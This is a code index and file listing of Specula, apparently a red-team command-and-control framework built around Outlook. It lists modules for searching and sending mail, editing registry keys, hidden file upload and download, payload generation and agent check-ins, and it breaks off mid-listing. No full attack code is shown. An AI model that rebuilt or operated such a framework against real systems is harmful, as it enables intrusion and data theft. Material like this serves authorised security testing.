FILE: functions/operation/outlook/search_email.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 119) | def preprocess(self, agent):
FILE: functions/operation/outlook/send_mail.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/sendfile_mail.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/stop_outlook.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/registry/delkeyhkcuregistry.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/registry/delvaluehkcuregistry.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/registry/getallkeysregistry.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 70) | def preprocess(self, agent):
FILE: functions/operation/registry/getallvaluesregistry.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 76) | def preprocess(self, agent):
FILE: functions/operation/registry/getvalueregistry.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 84) | def preprocess(self, agent):
FILE: functions/operation/registry/setvaluehkcuregistry.py
class Spec (line 7) | class Spec(SpecModule):
method __init__ (line 8) | def __init__(self, templatepath, helpers):
FILE: functions/operation/specula/remove_allowlongscriptruntime.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/operation/specula/set_allowlongscriptruntime.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/trolling/play_voice.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/trolling/set_clipboard.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: hiddenFunctions/downloadGAL.py
class Spec (line 7) | class Spec(SpecModule):
method __init__ (line 8) | def __init__(self, templatepath, helpers):
method rethandler (line 45) | def rethandler(self, agent, options, data):
FILE: hiddenFunctions/download_file.py
class Spec (line 9) | class Spec(SpecModule):
method __init__ (line 10) | def __init__(self, templatepath, helpers):
method rethandler (line 53) | def rethandler(self, agent, options, data):
FILE: hiddenFunctions/upload_file.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 39) | def rethandler(self, agent, options, data):
FILE: hooker_generator.py
function logo (line 5) | def logo():
class Payloads (line 43) | class Payloads:
method __init__ (line 44) | def __init__(self, url, encryptionkey, version, activex, outputpath, j...
method gen_registry_hooker (line 60) | def gen_registry_hooker(self):
method gen_outfile_registry_hooker (line 152) | def gen_outfile_registry_hooker(self):
function main (line 157) | def main():
FILE: lib/core/helpers.py
class Helpers (line 22) | class Helpers:
method __init__ (line 23) | def __init__(self, weblog): #DATABASEFILENAME
method complete_path (line 48) | def complete_path(path, line, **kwargs):
method getpayloaddir (line 54) | def getpayloaddir(self):
method getarguments (line 58) | def getarguments(cmd):
method insertTask (line 66) | def insertTask(self, agent, module, name):
method setModOption (line 78) | def setModOption(mod, optname, optval=None, prompt="value: "):
method addJitter (line 88) | def addJitter(self, jitter, time):
method sendPush (line 94) | def sendPush(self, ip, hostname, msg):
method renderModule (line 118) | def renderModule(self, module, agent):
method parseURI (line 143) | def parseURI(uri):
method closelog (line 154) | def closelog(self): # this is only being used because tornado is a PIT...
method speclog (line 159) | def speclog(self, logline, output=False):
method operatorlog (line 166) | def operatorlog(self, logline, output=False):
method get_module (line 174) | def get_module(self, p, hidden=False):
method loadTaskBooks (line 183) | def loadTaskBooks(self, path):
method loadModules (line 197) | def loadModules(self, path, hidden=False):
method loadModule (line 218) | def loadModule(self, path):
method save_agents_to_file (line 229) | def save_agents_to_file(self, filename = None):
method load_agents_from_file (line 235) | def load_agents_from_file(self, filename = None):
method save_payloads_to_file (line 242) | def save_payloads_to_file(self, filename = None):
method load_payloads_from_file (line 248) | def load_payloads_from_file(self, filename = None):
method init_blocklist (line 255) | def init_blocklist(self):
method listblocklist (line 267) | def listblocklist(self):
method listallowlist (line 275) | def listallowlist(self):
method addblocklist (line 284) | def addblocklist(self, ip, auto=True):
method inblocklist (line 309) | def inblocklist(self, ip):
method pastenddate (line 323) | def pastenddate(self):
FILE: lib/core/setup.py
function isdate (line 15) | def isdate(value):
class Config (line 28) | class Config:
method __init__ (line 29) | def __init__(self, configpath):
method _getopt (line 46) | def _getopt(msg, validator=None, value=None):
method _setup (line 53) | def _setup(self):
method _save_config (line 100) | def _save_config(self):
method PUSHOVER_API_TOKEN (line 105) | def PUSHOVER_API_TOKEN(self):
method PUSHOVER_API_TOKEN (line 109) | def PUSHOVER_API_TOKEN(self, value):
method PUSHOVER_APP_API_TOKEN (line 117) | def PUSHOVER_APP_API_TOKEN(self):
method PUSHOVER_APP_API_TOKEN (line 121) | def PUSHOVER_APP_API_TOKEN(self, value):
method TIME_FORMAT (line 129) | def TIME_FORMAT(self):
method TIME_FORMAT (line 133) | def TIME_FORMAT(self, value):
method DNS_NAME (line 138) | def DNS_NAME(self):
method DNS_NAME (line 142) | def DNS_NAME(self, value):
method INITIAL_CHECKIN_COUNT (line 148) | def INITIAL_CHECKIN_COUNT(self):
method INITIAL_CHECKIN_COUNT (line 152) | def INITIAL_CHECKIN_COUNT(self,value):
method VALIDATE_URL (line 158) | def VALIDATE_URL(self):
method VALIDATE_URL (line 162) | def VALIDATE_URL(self, value):
method BASE_PATH_AGENT_COM (line 170) | def BASE_PATH_AGENT_COM(self):
method BASE_PATH_AGENT_COM (line 174) | def BASE_PATH_AGENT_COM(self, value):
method BASE_PAYLOAD_URL (line 182) | def BASE_PAYLOAD_URL(self):
method BASE_PAYLOAD_URL (line 186) | def BASE_PAYLOAD_URL(self, value):
method REDIRECT_FALSE_AGENTS (line 194) | def REDIRECT_FALSE_AGENTS(self):
method REDIRECT_FALSE_AGENTS (line 198) | def REDIRECT_FALSE_AGENTS(self, value):
method ENCRYPTIONKEY_VALUENAME (line 204) | def ENCRYPTIONKEY_VALUENAME(self):
method ENCRYPTIONKEY_VALUENAME (line 208) | def ENCRYPTIONKEY_VALUENAME(self, value):
method ENCRYPTIONKEY_REGISTRY_LOCATION (line 214) | def ENCRYPTIONKEY_REGISTRY_LOCATION(self):
method ENCRYPTIONKEY_REGISTRY_LOCATION (line 218) | def ENCRYPTIONKEY_REGISTRY_LOCATION(self, value):
method DEFAULT_REFRESH_TIME (line 228) | def DEFAULT_REFRESH_TIME(self):
method DEFAULT_REFRESH_TIME (line 232) | def DEFAULT_REFRESH_TIME(self,value):
method SPECULA_LOG_FILE (line 238) | def SPECULA_LOG_FILE(self):
method SPECULA_LOG_FILE (line 242) | def SPECULA_LOG_FILE(self,value):
method OPERATOR_LOG_FILE (line 248) | def OPERATOR_LOG_FILE(self):
method OPERATOR_LOG_FILE (line 252) | def OPERATOR_LOG_FILE(self,value):
method SERVER_HEADER (line 258) | def SERVER_HEADER(self):
method SERVER_HEADER (line 262) | def SERVER_HEADER(self, value):
method OUTLOOK_VIEW_ID (line 268) | def OUTLOOK_VIEW_ID(self):
method OUTLOOK_VIEW_ID (line 272) | def OUTLOOK_VIEW_ID(self, value):
method CLSID (line 278) | def CLSID(self):
method CLSID (line 282) | def CLSID(self, value):
method DATABASEFILENAME (line 288) | def DATABASEFILENAME(self):
method DATABASEFILENAME (line 292) | def DATABASEFILENAME(self,value):
method PAYLOADFILENAME (line 298) | def PAYLOADFILENAME(self):
method PAYLOADFILENAME (line 302) | def PAYLOADFILENAME(self,value):
method SSL (line 308) | def SSL(self):
method SSL (line 312) | def SSL(self, value):
method CERT_FILE (line 319) | def CERT_FILE(self):
method CERT_FILE (line 323) | def CERT_FILE(self,value):
method KEY_FILE (line 329) | def KEY_FILE(self):
method KEY_FILE (line 333) | def KEY_FILE(self,value):
method JITTER (line 339) | def JITTER(self):
method JITTER (line 343) | def JITTER(self, value):
method IP_blocklist (line 349) | def IP_blocklist(self):
method IP_blocklist (line 353) | def IP_blocklist(self, value):
method END_DATE (line 358) | def END_DATE(self):
method END_DATE (line 366) | def END_DATE(self, value):
method WEBSERVER_PORT (line 373) | def WEBSERVER_PORT(self):
method WEBSERVER_PORT (line 377) | def WEBSERVER_PORT(self,value):
method PUSH_VALIDATION (line 383) | def PUSH_VALIDATION(self):
method PUSH_VALIDATION (line 387) | def PUSH_VALIDATION(self, value):
method PUSH_NEWAGENT (line 395) | def PUSH_NEWAGENT(self):
method PUSH_NEWAGENT (line 399) | def PUSH_NEWAGENT(self, value):
method PUSH_NEWIP (line 407) | def PUSH_NEWIP(self):
method PUSH_NEWIP (line 411) | def PUSH_NEWIP(self, value):
method PUSH_UNEXPECTEDCALLBACK (line 419) | def PUSH_UNEXPECTEDCALLBACK(self):
method PUSH_UNEXPECTEDCALLBACK (line 423) | def PUSH_UNEXPECTEDCALLBACK(self, value):
method PUSH_UNKNOWNCONNECTION (line 431) | def PUSH_UNKNOWNCONNECTION(self):
method PUSH_UNKNOWNCONNECTION (line 435) | def PUSH_UNKNOWNCONNECTION(self, value):
method PUSH_PRESTAGE (line 443) | def PUSH_PRESTAGE(self):
method PUSH_PRESTAGE (line 447) | def PUSH_PRESTAGE(self, value):
method PUSH_CONNECTION_OUTSIDESPECULA (line 455) | def PUSH_CONNECTION_OUTSIDESPECULA(self):
method PUSH_CONNECTION_OUTSIDESPECULA (line 459) | def PUSH_CONNECTION_OUTSIDESPECULA(self, value):
FILE: lib/core/specagents.py
class AgentListClass (line 8) | class AgentListClass(UserList):
method __init__ (line 9) | def __init__(self):
method get_agent (line 12) | def get_agent(self, id):
method get_agent_hostname (line 18) | def get_agent_hostname(self, name):
method get_max_id (line 24) | def get_max_id(self):
method get_agents_id (line 33) | def get_agents_id(self):
method get_prestaged_agents (line 39) | def get_prestaged_agents(self):
method register_agent (line 47) | def register_agent(self, sessionid,remoteip,useragent,lastcheckin):
class AgentClass (line 63) | class AgentClass:
method __init__ (line 64) | def __init__(self, sessionid, myid):
method generate_com (line 94) | def generate_com(self):
method generate_customcom (line 103) | def generate_customcom(self, url, codeurl, supporturl):
method update_callback (line 109) | def update_callback(self):
method updateinitialcheckincount (line 112) | def updateinitialcheckincount(self, initialcheckincount):
method size_taskqueue (line 115) | def size_taskqueue(self):
method remove_task (line 118) | def remove_task(self):
method add_task (line 121) | def add_task(self, item):
method get_nexttask (line 124) | def get_nexttask(self):
FILE: lib/core/specmodule.py
class SpecModule (line 5) | class SpecModule:
method __init__ (line 6) | def __init__(self, templatepath=None):
method set_option (line 17) | def set_option(self, optionname, value):
method get_option (line 25) | def get_option(self, optionname):
method _validate_option (line 31) | def _validate_option(self, optionname, value):
method check_required (line 39) | def check_required(self):
method preprocess (line 49) | def preprocess(self, agent):
method rethandler (line 60) | def rethandler(self, agent, options, data):
method cleanup (line 63) | def cleanup(self):
FILE: lib/core/specpayload.py
class PayloadListClass (line 11) | class PayloadListClass(UserList):
method __init__ (line 12) | def __init__(self):
method get_payload_id (line 15) | def get_payload_id(self, id):
method get_payload_name (line 21) | def get_payload_name(self, name):
method get_payloads_id (line 27) | def get_payloads_id(self):
method register_payload (line 33) | def register_payload(self, sourcepath, destinationname):
method remove_payload (line 47) | def remove_payload(self, selected_payload):
class PayloadClass (line 51) | class PayloadClass:
method __init__ (line 52) | def __init__(self):
method generate_payload (line 58) | def generate_payload(self):
FILE: lib/core/spectaskbook.py
class SpecTaskBook (line 4) | class SpecTaskBook(SpecModule):
method __init__ (line 5) | def __init__(self):
FILE: lib/core/utility.py
function encrypt_code (line 5) | def encrypt_code(code, key):
function decrypt_code (line 23) | def decrypt_code(code, key):
class TaskClass (line 39) | class TaskClass:
method __init__ (line 40) | def __init__(self, funcname, code, entry, options, encrypt=True, statu...
FILE: lib/core/utils.py
function getChars (line 20) | def getChars(inputstring):
function ConvertToArray (line 30) | def ConvertToArray(inputint):
function ConvertBackToInt (line 41) | def ConvertBackToInt(inputstring):
FILE: lib/handlers/specapplication.py
class speculaApplication (line 7) | class speculaApplication(tornado.web.Application):
method __init__ (line 8) | def __init__(self, helpers, handlers = None, default_host = None, tran...
FILE: lib/handlers/speccomms.py
class AgentComHandler (line 27) | class AgentComHandler(tornado.web.RequestHandler):
method set_default_headers (line 28) | def set_default_headers(self):
method get (line 31) | def get(self):
method post (line 187) | def post(self):
FILE: lib/handlers/specdevcomms.py
class AgentDevComHandler (line 9) | class AgentDevComHandler(tornado.web.RequestHandler):
method set_default_headers (line 10) | def set_default_headers(self):
method get (line 13) | def get(self):
method post (line 158) | def post(self):
FILE: lib/handlers/specpayload.py
class PayloadHandler (line 5) | class PayloadHandler(tornado.web.StaticFileHandler):
method set_default_headers (line 6) | def set_default_headers(self):
FILE: lib/handlers/specvalidate.py
class ValidateAgentHandler (line 9) | class ValidateAgentHandler(tornado.web.RequestHandler):
method set_default_headers (line 10) | def set_default_headers(self):
method get (line 14) | def get(self):
method post (line 62) | def post(self):
class UnknownPageHandler (line 146) | class UnknownPageHandler(tornado.web.RequestHandler):
method set_default_headers (line 149) | def set_default_headers(self):
method get (line 152) | def get(self):
FILE: lib/menu/specpromptdbedit.py
class SpecPromptDbedit (line 13) | class SpecPromptDbedit(cmd.Cmd):
method __init__ (line 14) | def __init__(self, selected_agent, helpers):
method precmd (line 26) | def precmd(self, line): # Added for operator logging
method emptyline (line 30) | def emptyline(self):
method do_list (line 41) | def do_list(self, inp):
method help_list (line 56) | def help_list(self):
method do_set (line 60) | def do_set(self, cmd):
method help_set (line 79) | def help_set(self):
method complete_set (line 87) | def complete_set(self, text, line, begidx, endidx):
method do_clear (line 92) | def do_clear(self, inp):
method help_clear (line 95) | def help_clear(self):
method do_back (line 99) | def do_back(self, inp):
method help_back (line 102) | def help_back(self):
FILE: lib/menu/specpromptexplorer.py
class SpecPromptExplorer (line 13) | class SpecPromptExplorer(cmd.Cmd):
method __init__ (line 14) | def __init__(self, selected_agent, helpers):
method precmd (line 26) | def precmd(self, line): # Added for operator logging
method emptyline (line 30) | def emptyline(self):
method do_back (line 41) | def do_back(self, inp):
method help_back (line 44) | def help_back(self):
method do_clear (line 48) | def do_clear(self, inp):
method help_clear (line 51) | def help_clear(self):
method do_refreshtime (line 55) | def do_refreshtime(self, inp):
method help_refreshtime (line 62) | def help_refreshtime(self):
method do_jitter (line 66) | def do_jitter(self, inp):
method help_jitter (line 73) | def help_jitter(self):
method do_pushnextcallback (line 77) | def do_pushnextcallback(self, inp):
method help_pushnextcallback (line 80) | def help_pushnextcallback(self):
method do_ls (line 83) | def do_ls(self, inp):
method help_ls (line 103) | def help_ls(self):
method do_cd (line 107) | def do_cd(self, inp):
method help_cd (line 118) | def help_cd(self):
method do_pwd (line 124) | def do_pwd(self, inp):
method help_pwd (line 130) | def help_pwd(self):
method do_cat (line 135) | def do_cat(self, inp):
method help_cat (line 150) | def help_cat(self):
FILE: lib/menu/specpromptinteract.py
class SpecPromptInteract (line 10) | class SpecPromptInteract(cmd.Cmd):
method __init__ (line 11) | def __init__(self, selected_agent, helpers):
method precmd (line 22) | def precmd(self, line): # Added for operator logging
method emptyline (line 26) | def emptyline(self):
method do_back (line 37) | def do_back(self, inp):
method help_back (line 40) | def help_back(self):
method do_info (line 44) | def do_info(self, inp):
method help_info (line 59) | def help_info(self):
method do_clear (line 63) | def do_clear(self, inp):
method help_clear (line 66) | def help_clear(self):
method do_clearagentdata (line 70) | def do_clearagentdata(self, inp):
method help_clearagentdata (line 80) | def help_clearagentdata(self):
method do_delete (line 84) | def do_delete(self, inp):
method help_delete (line 95) | def help_delete(self):
method do_refreshtime (line 99) | def do_refreshtime(self, inp):
method help_refreshtime (line 106) | def help_refreshtime(self):
method do_jitter (line 110) | def do_jitter(self, inp):
method help_jitter (line 117) | def help_jitter(self):
method do_data (line 121) | def do_data(self, inp):
method help_data (line 128) | def help_data(self):
method do_qlist (line 132) | def do_qlist(self, inp):
method help_qlist (line 150) | def help_qlist(self):
method do_qdel (line 154) | def do_qdel(self, inp):
method help_qdel (line 174) | def help_qdel(self):
method do_usemodule (line 179) | def do_usemodule(self, inp):
method help_usemodule (line 200) | def help_usemodule(self):
method do_explorer (line 204) | def do_explorer(self, inp):
method help_explorer (line 226) | def help_explorer(self):
method do_pushnextcallback (line 230) | def do_pushnextcallback(self, inp):
method help_pushnextcallback (line 233) | def help_pushnextcallback(self):
method complete_usemodule (line 236) | def complete_usemodule(self, text, line, begidx, endidx):
method do_runTaskBook (line 239) | def do_runTaskBook(self, cmd):
method complete_runTaskBook (line 253) | def complete_runTaskBook(self, text, line, begidx, endidx):
method help_runTaskbook (line 256) | def help_runTaskbook(self):
FILE: lib/menu/specpromptmodule.py
class SpecPromptModule (line 9) | class SpecPromptModule(cmd.Cmd):
method __init__ (line 10) | def __init__(self, helpers, selected_module, selected_agent, prompt):
method precmd (line 24) | def precmd(self, line): # Added for operator logging
method emptyline (line 37) | def emptyline(self):
method do_back (line 48) | def do_back(self, inp):
method help_back (line 51) | def help_back(self):
method do_options (line 55) | def do_options(self, cmd):
method help_options (line 64) | def help_options(self):
method do_set (line 68) | def do_set(self, cmd):
method complete_set (line 81) | def complete_set(self, text, line, start_index, end_index):
method help_set (line 109) | def help_set(self):
method do_run (line 113) | def do_run(self, inp):
method help_run (line 132) | def help_run(self):
method do_add (line 136) | def do_add(self, inp):
method help_add (line 155) | def help_add(self):
method do_clear (line 159) | def do_clear(self, inp):
method help_clear (line 162) | def help_clear(self):
FILE: lib/menu/specpromptpayload.py
class SpecPromptPayload (line 13) | class SpecPromptPayload(cmd.Cmd):
method __init__ (line 14) | def __init__(self, helpers):
method precmd (line 24) | def precmd(self, line): # Added for operator logging
method emptyline (line 28) | def emptyline(self):
method do_clear (line 39) | def do_clear(self, inp):
method do_list (line 42) | def do_list(self, inp):
method help_list (line 45) | def help_list(self):
method do_remove (line 49) | def do_remove(self, inp):
method complete_remove (line 73) | def complete_remove(self, text, line, begidx, endidx):
method help_remove (line 79) | def help_remove(self):
method do_add (line 83) | def do_add(self, inp):
method complete_add (line 103) | def complete_add(self, text, line, begidx, endidx):
method do_list (line 106) | def do_list(self, inp):
method help_add (line 114) | def help_add(self):
method help_clear (line 119) | def help_clear(self):
method do_back (line 123) | def do_back(self, inp):
method help_back (line 126) | def help_back(self):
FILE: lib/menu/specpromptprestage.py
class SpecPromptPrestage (line 11) | class SpecPromptPrestage(cmd.Cmd):
method __init__ (line 12) | def __init__(self, helpers):
method precmd (line 22) | def precmd(self, line): # Added for operator logging
method emptyline (line 26) | def emptyline(self):
method do_clear (line 37) | def do_clear(self, inp):
method help_clear (line 40) | def help_clear(self):
method do_back (line 44) | def do_back(self, inp):
method help_back (line 47) | def help_back(self):
method do_list (line 51) | def do_list(self, inp):
method help_list (line 60) | def help_list(self):
method do_new (line 64) | def do_new(self, inp):
method help_new (line 100) | def help_new(self):
method do_custom (line 105) | def do_custom(self, inp):
method do_dev (line 129) | def do_dev(self, inp):
method help_custom (line 150) | def help_custom(self):
FILE: lib/menu/specpromptpushover.py
class SpecPromptPushover (line 13) | class SpecPromptPushover(cmd.Cmd):
method __init__ (line 14) | def __init__(self, helpers):
method precmd (line 24) | def precmd(self, line): # Added for operator logging
method emptyline (line 28) | def emptyline(self):
method do_clear (line 39) | def do_clear(self, inp):
method do_listpushoverkeys (line 42) | def do_listpushoverkeys(self, inp):
method help_listpushoverkeys (line 52) | def help_listpushoverkeys(self):
method do_removepushoverkey (line 56) | def do_removepushoverkey(self, inp):
method complete_removepushoverkey (line 69) | def complete_removepushoverkey(self, text, line, begidx, endidx):
method help_removepushoverkey (line 72) | def help_removepushoverkey(self):
method do_addpushoverkey (line 76) | def do_addpushoverkey(self, inp):
method help_addpushoverkey (line 92) | def help_addpushoverkey(self):
method do_testpush (line 96) | def do_testpush(self, cmd):
method help_testpush (line 100) | def help_testpush(self):
method do_subscriptions (line 104) | def do_subscriptions(self, inp):
method help_subscriptions (line 116) | def help_subscriptions(self):
method do_changesubscription (line 120) | def do_changesubscription(self, cmd):
method complete_changesubscription (line 133) | def complete_changesubscription(self, text, line, begidx, endidx):
method help_changesubscription (line 139) | def help_changesubscription(self):
method help_clear (line 143) | def help_clear(self):
method do_back (line 147) | def do_back(self, inp):
method help_back (line 150) | def help_back(self):
FILE: lib/modhandlers/generic.py
function quotedstring (line 2) | def quotedstring(value, **kwargs):
function escapebackslash (line 7) | def escapebackslash(value, **kwargs):
function makeint (line 12) | def makeint(value, **kwargs):
function makelist (line 15) | def makelist(value, **kwargs):
function escapequotes (line 19) | def escapequotes(value, **kwargs):
function makebool (line 22) | def makebool(value, **kwargs):
FILE: lib/tab_completers/generic.py
function tab_choice (line 3) | def tab_choice(val, line, **kwargs):
FILE: lib/validators/files.py
function isreadable (line 4) | def isreadable(path, **kwargs):
function isbasename (line 18) | def isbasename(path, **kwargs):
FILE: lib/validators/generic.py
function iswebaddress (line 4) | def iswebaddress(val, **kwargs):
function isboolstring (line 11) | def isboolstring(val, **kwargs):
function maxlen (line 24) | def maxlen(val, **kwargs):
function ischoice (line 38) | def ischoice(val, **kwargs):
function isint (line 52) | def isint(val, **kwargs):
FILE: specula.py
class SpecPrompt (line 86) | class SpecPrompt(cmd.Cmd): #Leaving this one here as it is the top level...
method __init__ (line 87) | def __init__(self, helpers):
method precmd (line 96) | def precmd(self, line): # Added for operator logging
method emptyline (line 100) | def emptyline(self):
method do_exit (line 111) | def do_exit(self, inp):
method help_exit (line 115) | def help_exit(self):
method do_updatecodebase (line 118) | def do_updatecodebase(self, inp):
method help_updatecodebase (line 124) | def help_updatecodebase(self):
method do_generatehooker (line 128) | def do_generatehooker(self, inp):
method help_generatehooker (line 141) | def help_generatehooker(self):
method do_agents (line 146) | def do_agents(self, inp):
method help_agents (line 160) | def help_agents(self):
method do_interact (line 164) | def do_interact(self, inp):
method help_interact (line 183) | def help_interact(self):
method complete_interact (line 187) | def complete_interact(self, text, line, begidx, endidx):
method do_pushover (line 191) | def do_pushover(self, inp):
method do_payload (line 202) | def do_payload(self, inp):
method help_payload (line 213) | def help_payload(self):
method do_dbedit (line 217) | def do_dbedit(self, inp):
method help_dbedit (line 230) | def help_dbedit(self):
method complete_dbedit (line 234) | def complete_dbedit(self, text, line, begidx, endidx):
method do_prestage (line 238) | def do_prestage(self, inp):
method help_prestage (line 249) | def help_prestage(self):
method do_settings (line 253) | def do_settings(self, inp): # Read from config file later on...
method help_settings (line 287) | def help_settings(self):
method do_listblocklist (line 291) | def do_listblocklist(self, cmd):
method do_listallowlist (line 294) | def do_listallowlist(self, cmd):
method do_addblocklist (line 297) | def do_addblocklist(self,cmd):
method help_addblocklist (line 305) | def help_addblocklist(self):
method do_updateSetting (line 309) | def do_updateSetting(self, cmd):
method do_approveAgent (line 329) | def do_approveAgent(self, cmd):
method complete_approveAgent (line 342) | def complete_approveAgent(self, text, line, begidx, endidx):
method help_approveAgent (line 345) | def help_approveAgent(self):
method do_blocklistAgent (line 348) | def do_blocklistAgent(self, cmd):
method complete_blocklistAgent (line 362) | def complete_blocklistAgent(self, text, line, begidx, endidx):
method help_blocklistAgent (line 365) | def help_blocklistAgent(self):
method help_updateSetting (line 369) | def help_updateSetting(self):
method complete_updateSetting (line 375) | def complete_updateSetting(self, text, line, begidx, endidx):
method do_clear (line 378) | def do_clear(self, inp):
method do_listallq (line 381) | def do_listallq(self, cmd):
method help_listallq (line 395) | def help_listallq(self):
method help_clear (line 399) | def help_clear(self):
method do_logo (line 403) | def do_logo(self, inp):
method help_logo (line 406) | def help_logo(self):
method do_dbdata (line 410) | def do_dbdata(self, inp):
method help_dbdata (line 428) | def help_dbdata(self):
method complete_dbdata (line 432) | def complete_dbdata(self, text, line, begidx, endidx):
method do_log (line 436) | def do_log(self, inp):
method help_log (line 442) | def help_log(self):
method do_resetdb (line 446) | def do_resetdb(self, inp):
method help_resetdb (line 457) | def help_resetdb(self):
method default (line 461) | def default(self, inp):
method do_runTaskbook (line 467) | def do_runTaskbook(self, cmd):
method complete_runTaskbook (line 490) | def complete_runTaskbook(self, text, line, begidx, endidx):
method help_runTaskbook (line 502) | def help_runTaskbook(self):
method do_version (line 505) | def do_version(self, version):
method help_version (line 508) | def help_version(self):
function sig_handler (line 511) | def sig_handler(server, sig, frame):
function main_c2 (line 533) | def main_c2(helpers):
function gen_logo (line 564) | def gen_logo():
Condensed preview — 312 files, each showing path, character count, and a content snippet (full structured content: 634K chars).
[
{
"path": ".gitignore",
"chars": 163,
"preview": "*.db\r\nconfigoptions.py\r\nspecConfig.ini\r\nDefaultBlacklist.txt\r\n.vscode/\r\nspecula_log.txt\r\nweblog.log\r\noperator_log.txt\r\na"
},
{
"path": "CONTRIBUTING.md",
"chars": 1411,
"preview": "# Contributions\nIf you are considering contributing to our repository, first thank you for doing so! </br>\n\nContribution"
},
{
"path": "README.md",
"chars": 140,
"preview": "Getting started info and information for developing your own modules is available on the [wiki](https://github.com/trust"
},
{
"path": "Taskbooks/enum_installed_software.py",
"chars": 1471,
"preview": "def TaskBook(helpers, agent):\n mod = helpers.get_module('operation/file/list_dir')\n helpers.setModOption(mod, 'dir"
},
{
"path": "Taskbooks/example.py",
"chars": 696,
"preview": "def TaskBook(helpers, agent):\n mod = helpers.get_module('enumerate/host/list_applocker') # this doesn't take argument"
},
{
"path": "api/README.md",
"chars": 12,
"preview": "# SpeculaApi"
},
{
"path": "api/SpeculaApi/Sepcula.cpp",
"chars": 3767,
"preview": "// Sepcula.cpp : Implementation of CSepcula\r\n\r\n#include \"pch.h\"\r\n#include \"Sepcula.h\"\r\n\r\n#define BUFFERSIZE 4096\r\n// CSe"
},
{
"path": "api/SpeculaApi/Sepcula.h",
"chars": 1006,
"preview": "// Sepcula.h : Declaration of the CSepcula\r\n\r\n#pragma once\r\n#include \"resource.h\" // main symbols\r\n\r\n\r\n\r\n#include "
},
{
"path": "api/SpeculaApi/Sepcula.rgs",
"chars": 595,
"preview": "HKCR\r\n{\r\n\tSpeculaApi.Specula.1 = s 'Specula class'\r\n\t{\r\n\t\tCLSID = s '{e8b55279-c6b4-48f3-8138-b727337c0236}'\r\n\t}\r\n\tSpecu"
},
{
"path": "api/SpeculaApi/SpeculaApi.cpp",
"chars": 1617,
"preview": "// SpeculaApi.cpp : Implementation of DLL Exports.\r\n\r\n\r\n#include \"pch.h\"\r\n#include \"framework.h\"\r\n#include \"resource.h\"\r"
},
{
"path": "api/SpeculaApi/SpeculaApi.def",
"chars": 209,
"preview": "; SpeculaApi.def : Declares the module parameters.\r\n\r\nLIBRARY\r\n\r\nEXPORTS\r\n\tDllCanUnloadNow\t\tPRIVATE\r\n\tDllGetClassObject\t"
},
{
"path": "api/SpeculaApi/SpeculaApi.idl",
"chars": 836,
"preview": "// SpeculaApi.idl : IDL source for SpeculaApi\r\n//\r\n\r\n// This file will be processed by the MIDL tool to\r\n// produce the "
},
{
"path": "api/SpeculaApi/SpeculaApi.rgs",
"chars": 12,
"preview": "HKCR\r\n{\r\n}\r\n"
},
{
"path": "api/SpeculaApi/SpeculaApi.vcxproj",
"chars": 14900,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "api/SpeculaApi/SpeculaApi.vcxproj.filters",
"chars": 2787,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "api/SpeculaApi/SpeculaApi_i.h",
"chars": 9077,
"preview": "\r\n\r\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\r\n\r\n\r\n /* File created by MIDL compiler "
},
{
"path": "api/SpeculaApi/SpeculaApips.def",
"chars": 139,
"preview": "\r\nLIBRARY\r\n\r\nEXPORTS\r\n\tDllGetClassObject\t\tPRIVATE\r\n\tDllCanUnloadNow\t\t\tPRIVATE\r\n\tDllRegisterServer\t\tPRIVATE\r\n\tDllUnregist"
},
{
"path": "api/SpeculaApi/dllmain.cpp",
"chars": 374,
"preview": "// dllmain.cpp : Implementation of DllMain.\r\n\r\n#include \"pch.h\"\r\n#include \"framework.h\"\r\n#include \"resource.h\"\r\n#include"
},
{
"path": "api/SpeculaApi/dllmain.h",
"chars": 316,
"preview": "// dllmain.h : Declaration of module class.\r\n\r\nclass CSpeculaApiModule : public ATL::CAtlDllModuleT< CSpeculaApiModule >"
},
{
"path": "api/SpeculaApi/framework.h",
"chars": 394,
"preview": "#pragma once\r\n\r\n#ifndef STRICT\r\n#define STRICT\r\n#endif\r\n\r\n#include \"targetver.h\"\r\n\r\n#define _ATL_APARTMENT_THREADED\r\n\r\n#"
},
{
"path": "api/SpeculaApi/pch.cpp",
"chars": 191,
"preview": "// pch.cpp: source file corresponding to the pre-compiled header\r\n\r\n#include \"pch.h\"\r\n\r\n// When you are using pre-compil"
},
{
"path": "api/SpeculaApi/pch.h",
"chars": 576,
"preview": "// pch.h: This is a precompiled header file.\r\n// Files listed below are compiled only once, improving build performance "
},
{
"path": "api/SpeculaApi/resource.h",
"chars": 542,
"preview": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by SpeculaApi.rc\r\n//\r\n#define IDS_PROJNA"
},
{
